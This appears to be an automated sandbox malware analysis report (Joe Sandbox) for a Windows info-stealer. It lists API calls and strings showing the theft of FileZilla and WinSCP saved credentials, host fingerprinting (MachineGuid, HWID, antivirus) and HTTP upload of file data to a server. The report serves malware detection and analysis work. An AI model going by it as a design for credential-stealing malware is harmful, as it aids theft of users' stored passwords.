                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 907984538-0
                                                                                                                                                                                                                            • Opcode ID: 804b59de0022c0a22ffba1be1da70e1bd92732a17a177211fa0686da41351996
                                                                                                                                                                                                                            • Instruction ID: 4ea20aa850d654643913a215028a8477d38f7f0d75996d48367efc27095c6f7e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 804b59de0022c0a22ffba1be1da70e1bd92732a17a177211fa0686da41351996
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3411A371A00218A7DB11FB219C85AEE73A9AF44704F00109AF90AB7291CB789FC58F59
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D1E
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410D25
                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?), ref: 00410D34
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410D52
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 362916592-0
                                                                                                                                                                                                                            • Opcode ID: e053bf9d0ea2a25b27af1172a1bfc3f5b5eb9bf6fc4c3b7a4649e4a77b228e05
                                                                                                                                                                                                                            • Instruction ID: feaee98c82f226e65d9751a1a55654853175a6affee0276e42e7902f2bb5e1d1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e053bf9d0ea2a25b27af1172a1bfc3f5b5eb9bf6fc4c3b7a4649e4a77b228e05
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 19F0E971A00324ABEB04DBB4EC49BAB37B9AB04729F100295F515D72D0DB74AF858B95
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C3B
                                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C4F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1206570057-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2452939696-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418586), ref: 004014DF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1586166983-0

                                                                                                                                                                                                                            Control-flow Graph

[Control-flow graph not reproduced; first block 405482-405593. Legend: Executed / Not Executed.]
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                                                                              • Part of subcall function 00411E32: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E708,?,?,?,004128E1,?,?,00000000), ref: 00411E52
                                                                                                                                                                                                                              • Part of subcall function 00411E32: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128E1,?,?,00000000), ref: 00411E5F
                                                                                                                                                                                                                              • Part of subcall function 00411E32: HeapAlloc.KERNEL32(00000000,?,?,?,004128E1,?,?,00000000), ref: 00411E66
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436976,0043695B,00436957,0043694B), ref: 00405588
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,",file_data,00437848,------,0043783C,?,",00437830,------,00437824,0b3bd69430b7d827b107ba2ed809207d,",build_id,0043780C,------), ref: 00405C67
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405C7A
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00405C99
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CA6
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00405CB4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00405CD6
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00405CE4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00405D05
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00405E46
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                            • String ID: ------$"$"$"$"$--$------$------$------$------$0b3bd69430b7d827b107ba2ed809207d$ERROR$ERROR$block$build_id$file_data

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 00411D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DD2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E72B,?,?,?), ref: 00407FC7
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FDE
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E72B,?,?,?), ref: 00407FF5
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E72B,?,?,?), ref: 0040800C
                                                                                                                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E72B,?,?,?), ref: 00408034
                                                                                                                                                                                                                              • Part of subcall function 00411DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416973,?), ref: 00411E0C
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 0040E753
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,000F423F,004368FF,004368FE,004368EF,004368EE), ref: 0040E799
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040E7A0
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7B4
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E7BF
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E7F3
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E7FE
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<User>), ref: 0040E82C
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E837
                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E865
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040E870
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E8D6
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040E8EA
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(0040EC91), ref: 0040EA12
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: CreateThread.KERNEL32(00000000,00000000,00416E08,?,00000000,00000000), ref: 00416F78
                                                                                                                                                                                                                              • Part of subcall function 00416ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F80
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E18C
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E1AC
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E1BD
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 0040E1CE
                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E202
                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E233
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E24B
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E272
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E292
                                                                                                                                                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E2B5
                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,004368D7), ref: 0040E34E
                                                                                                                                                                                                                            • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0040E3AE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                                                            • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                            • API String ID: 463713726-2798830873

                                                                                                                                                                                                                            Control-flow Graph

[Control-flow graph image not preserved. Entry block 568 covers 405f39-405ffe. Named API calls in the graph: InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, lstrlenA, GetProcessHeap, HeapAlloc, HttpSendRequestA, InternetReadFile, InternetCloseHandle.]
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                                                                              • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,",mode,004378D0,------,004378C4,0b3bd69430b7d827b107ba2ed809207d,",build_id,004378AC,------,004378A0,",00437894,------), ref: 004065FD
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040660C
                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00406617
                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040661E
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 0040662B
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00406639
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00406647
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406655
                                                                                                                                                                                                                            • _memmove.LIBCMT ref: 00406662
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00406677
                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00406685
                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004066E2
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 004066ED
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 004066F9
                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00406705
                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                            • String ID: "$"$"$------$------$------$------$0b3bd69430b7d827b107ba2ed809207d$build_id$mode
                                                                                                                                                                                                                            • API String ID: 3702379033-3877027458

                                                                                                                                                                                                                            Control-flow Graph

[Control-flow graph image not preserved. Block 818 covers 413bc6-4145e5. Named API calls in the graph: GetCurrentProcessId, lstrlenA; all other calls are to internal subroutines.]
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                              • Part of subcall function 00410C95: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CAD
                                                                                                                                                                                                                              • Part of subcall function 00410C95: HeapAlloc.KERNEL32(00000000), ref: 00410CB4
                                                                                                                                                                                                                              • Part of subcall function 00410C95: GetLocalTime.KERNEL32(?), ref: 00410CC0
                                                                                                                                                                                                                              • Part of subcall function 00410C95: wsprintfA.USER32 ref: 00410CEB
                                                                                                                                                                                                                              • Part of subcall function 004115A9: _memset.LIBCMT ref: 004115DC
                                                                                                                                                                                                                              • Part of subcall function 004115A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 004115FB
                                                                                                                                                                                                                              • Part of subcall function 004115A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00411620
                                                                                                                                                                                                                              • Part of subcall function 004115A9: RegCloseKey.ADVAPI32(?,?,?,?), ref: 0041162C
                                                                                                                                                                                                                              • Part of subcall function 004115A9: CharToOemA.USER32(?,?), ref: 00411640
                                                                                                                                                                                                                              • Part of subcall function 00411659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00411674
                                                                                                                                                                                                                              • Part of subcall function 00411659: _memset.LIBCMT ref: 004116A3
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116CB
                                                                                                                                                                                                                              • Part of subcall function 00411659: lstrcatA.KERNEL32(?,00436ED4,?,?,?,?,?), ref: 004116E8
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410977: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109AA
                                                                                                                                                                                                                              • Part of subcall function 00410977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 004109EA
                                                                                                                                                                                                                              • Part of subcall function 00410977: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A3F
                                                                                                                                                                                                                              • Part of subcall function 00410977: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A46
                                                                                                                                                                                                                            • GetCurrentProcessId.KERNEL32(Path: ,00436884,HWID: ,00436878,GUID: ,0043686C,00000000,MachineID: ,0043685C,00000000,Date: ,00436850,0043684C,11.1,Version: ,004365B6), ref: 00413E1B
                                                                                                                                                                                                                              • Part of subcall function 0041221F: OpenProcess.KERNEL32(00000410,00000000,*>A,00000000,?), ref: 00412241
                                                                                                                                                                                                                              • Part of subcall function 0041221F: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0041225C
                                                                                                                                                                                                                              • Part of subcall function 0041221F: CloseHandle.KERNEL32(00000000), ref: 00412263
                                                                                                                                                                                                                              • Part of subcall function 00410B05: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B19
                                                                                                                                                                                                                              • Part of subcall function 00410B05: HeapAlloc.KERNEL32(00000000,?,?,?,00413ED5,Windows: ,004368A8), ref: 00410B20
                                                                                                                                                                                                                              • Part of subcall function 004117DC: __EH_prolog3_catch_GS.LIBCMT ref: 004117E3
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413F39,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 004117F4
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411805
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041181F
                                                                                                                                                                                                                              • Part of subcall function 004117DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411855
                                                                                                                                                                                                                              • Part of subcall function 004117DC: VariantInit.OLEAUT32(?), ref: 004118B0
                                                                                                                                                                                                                              • Part of subcall function 0041196C: __EH_prolog3_catch.LIBCMT ref: 00411973
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoInitializeEx.OLE32(00000000,00000000,00000030,00413FA7,?,AV: ,004368CC,Install Date: ,004368B8,00000000,Windows: ,004368A8,Work Dir: In memory,00436890), ref: 00411982
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411993
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119AD
                                                                                                                                                                                                                              • Part of subcall function 0041196C: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004119E3
                                                                                                                                                                                                                              • Part of subcall function 0041196C: VariantInit.OLEAUT32(?), ref: 00411A32
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C66
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C6D
                                                                                                                                                                                                                              • Part of subcall function 00410C5A: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410C81
                                                                                                                                                                                                                              • Part of subcall function 00410C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C34
                                                                                                                                                                                                                              • Part of subcall function 00410C28: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C3B
